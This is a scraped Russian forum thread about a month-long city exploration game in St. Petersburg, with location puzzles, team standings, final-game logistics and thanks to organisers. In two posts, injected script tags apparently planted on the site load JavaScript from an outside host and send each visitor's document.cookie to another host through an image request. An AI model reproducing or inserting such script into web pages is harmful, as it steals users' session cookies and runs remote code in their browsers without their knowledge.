![]() |
Цитата:
|
Цитата:
1. 600229301945 2. 595314301534 :D:D |
Цитата:
Код 2 верен. Вы закрыли уровень и развлеклись. Спасибо ) |
ЗЫ: а неплохая разминочная ветка была бы... Один скинул фотку, другой раскурил и скинул фотку своей локи и тд и тп...
|
Цитата:
|
Цитата:
Можно загадывать локи, которых нет на вики. Раскурка - либо адрес, либо корды. |
Цитата:
|
Цитата:
Я ж не местный, поэтому специализируюсь только по локам ;) |
Цитата:
|
Цитата:
|
Цитата:
Только боюсь, что если ты туда залезешь, то до завтра из участка могут и не выпустить ))) |
И уважаемые игроки, не забываем регистрироваться в движке на финальную игру.
|
еще не играли:
уткина дача, дамба на революции, говнодом на уделке и многое прочее. на моей карте еще ровно 100 адресов осталось:) |
Цитата:
|
Цитата:
2. мы не брали дамбы, мосты, жд мосты, коллекторы и т.д. 3. старались брать по минимуму того, что с приставкой "говно", но совсем избежать не удалось. |
Цитата:
|
Цитата:
ЖВ |
Цитата:
|
Цитата:
|
Цитата:
А Влад все равно победил, ибо 30 - аргумент :D Цитата:
Просто он, видимо, тоже как и я смайл ":D" пишет руками, а не тыкает мышкой, а иногда раскладка не переключается |
Цитата:
|
Цитата:
|
Цитата:
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
Мне 68 в кошмарах снится...
|
Цитата:
- мужики, не помешаю? - не, заходи, а зачем тебе? - да, типа, полазать надо немного - а, ну ладно, а долго? - как пойдет - а водички наберете нам? Через 15 минут меня там уже не было |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Обновил:
1) Люди_Х - зарегились на финалку 2) Fantomas - зарегились на финалку 3) КПБ - зарегились на финалку 4) psychos 5) Развоlution И могут попасть в финал до 09.00 17.05: 1) Пешеезды (осталось 10 бонусов, около 3 боянов) 2) FST (осталось 15 бонусов, около 5 боянов) 3) К.Е. (осталось 5 бонусов, около 2 боянов) 4) Пакмэн (осталось 7 бонусов, около 2 боянов) - зарегились на финалку |
Цитата:
|
Цитата:
|
Цитата:
|
И ребят, от участников финала нужны будут: номер, марка и цвет ТС.
Цвет машины нужен мне, остальное - Славке ))) |
Цитата:
Цитата:
|
Цитата:
|
Цитата:
Сделай ППО плиз. P.S. Эта информация будет нужна не позднее 21.30. Если информация не будет предоставлена, это основание снять команду с финала. Команд, которые играют вне зачета, это не касается. |
Цитата:
|
Цитата:
ППО сделано. |
И, кстати, "За всю хурму" нефигово так рванули. Чуть больше суток бонусов добрать осталось.
|
Цитата:
21 уровень - 13/16 31 уровень - 8/12 4 бонуса, прмерно 2 бояна. Отправлено с моего ThL W3 через Tapatalk <script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
а что за 68 то? я бомжей только на седова и на старо-петергофском во дворах видел, еще на матроса. Но видя меня они только выразительно молчали
|
Цитата:
|
Цитата:
|
Большинство встреченных вообще выразительно спали.
На одном из последних правда готовили еду, дымило на весь дом. =) |
а че все секрет то держат?
в гаи вот за неувереннось сразу бал скидывают |
а подписывать бумажки о соблюдении пдд не надо, надеюсь?
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
ПЕ в финале)) Осталось найти людей на финал)))
|
Цитата:
|
Цитата:
|
Цитата:
|
ку, ППО то будет?
|
Цитата:
ПС. У меня чуть на баяне на Мебельной его не стырила гопота |
Цитата:
Не забываем регистрироваться и сообщать данные о машинах. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
я может глупость спрошу, а с телефона движок открыть как-то можно?
или у меня просто руки кривые? |
Цитата:
|
Цитата:
|
Цитата:
|
Брифинг финальной игры состоится на парковке О'кея у ст.м. Ладожская
|
Цитата:
|
Цитата:
|
Все кончилось...
|
Цитата:
|
Спасибо за месяц...
С одной стороны - слава богу это кончилось, с другой... эх.. не надо больше в метро по дороге на работу открывать двигло и курить фотки... было чем заняться утром на работе, на обеде на работе пилить локи, после работы пилить локи, по выходным и праздникам пилить локи... Отдельное спасибо за финальную игру. Динамично, лайтово, простенько и со вкусом и, наконец-таки, везде маркер. Спасибо всем кто играл и с кем пересекались на локах, большое спасибо команде и килолитрам бензина. Ну, и, естественно, отдельное спасибо Даше со Славой. Впереди годовая 1001 и 3-хлетка 3003 :D:D |
Цитата:
Спасибо за игру. Но в пригороде реально, если не знаешь локу, то ты не будешь первым и найти ее на вике шансов нет без нормального интернета. |
люди х, вам вобще не жалко аккорд? я был в шоке увидев его мтоящим у конюшен....
|
Спасибо за игру=)
Это было весело. ) |
Цитата:
|
стату то где глянуть?)
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Друзья, спасибо за игру, это было отлично! Спасибо полю, штабу, короче всей команде имени Кеши Евдокимова. Финалка была превосходной, лажи оргов не замечено) синхронность разволюшн и психоза прям паровозительна)
|
ППО.
Статистика и мониторинг доступны. Правьте составы, в понедельник закроем игру. Как считалась финальная статистика за месяц: - командам, взявшим 69 баян был назначен штраф 3 часа; - всем командам было компенсировано время закрытия 1-го уровня (бонусом); - командам, которые не вышли в финал был назначен штраф в 1 день; - командам, которые вышли в финал назначен штраф, равный времени прохождению игры. Если есть вопросы - задавайте, постараюсь ответить. Спасибо Миксу и Грицу за консультации по движку ))) Вот теперь, надеюсь, действительно все закончилось... Спасибо всем, кто играл, ребят, вы совершенно ненормальные и это клево! Спасибо всем, кто так или иначе помогал нам делать эту игру. И, конечно, спасибо Славе за его сумасшедшие идеи, которые так интересно воплощать в жизнь ) P/S/ Фотки выложу чуть попозже. |
Дашуль, доведи всех до финиша, составы чтобы окончательно править, т.к. сейчас все в других командах ;) игра не закрыта, и составы впрямую править сложно на грани невозможно.
|
Спасибо за месяц, плюсану к Соде, это было круто - начинать каждый день по пути на работу в маршрутке/метро с просмотра движка и мобильной викимапии/урбантрипа/хидденсайда/ситиволлс/и т.д./и т.п. подобных ресурсов, потомучто честно - для меня процентов 30 заигранного были новыми местами, а после работы не ехать домой, а выстраивать маршрут на общественном транспорте через разгаданное и не снятое еще, таким образом чтобы еще и успеть попасть все-таки домой "пока трамваи ходют", скилл прокачен, за это вам отдельное спасибо :)
http://img694.imageshack.us/img694/1711/1001over.jpg Финалка тоже не подкачала, динамично, не задротно (почти), приютившей меня в поля на нее команде Психоз, отдельное спасибо. <script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
|
Цитата:
|
Цитата:
|
Ребят, все составы отредактировали?
Особенно это относится к командам, у которых сейчас запилено по 2 человека. Сегодня вечером закроем игру и начислим очки, кто не успеет - сами себе злобные буратины. |
Часовой пояс GMT +3, время: 07:08. |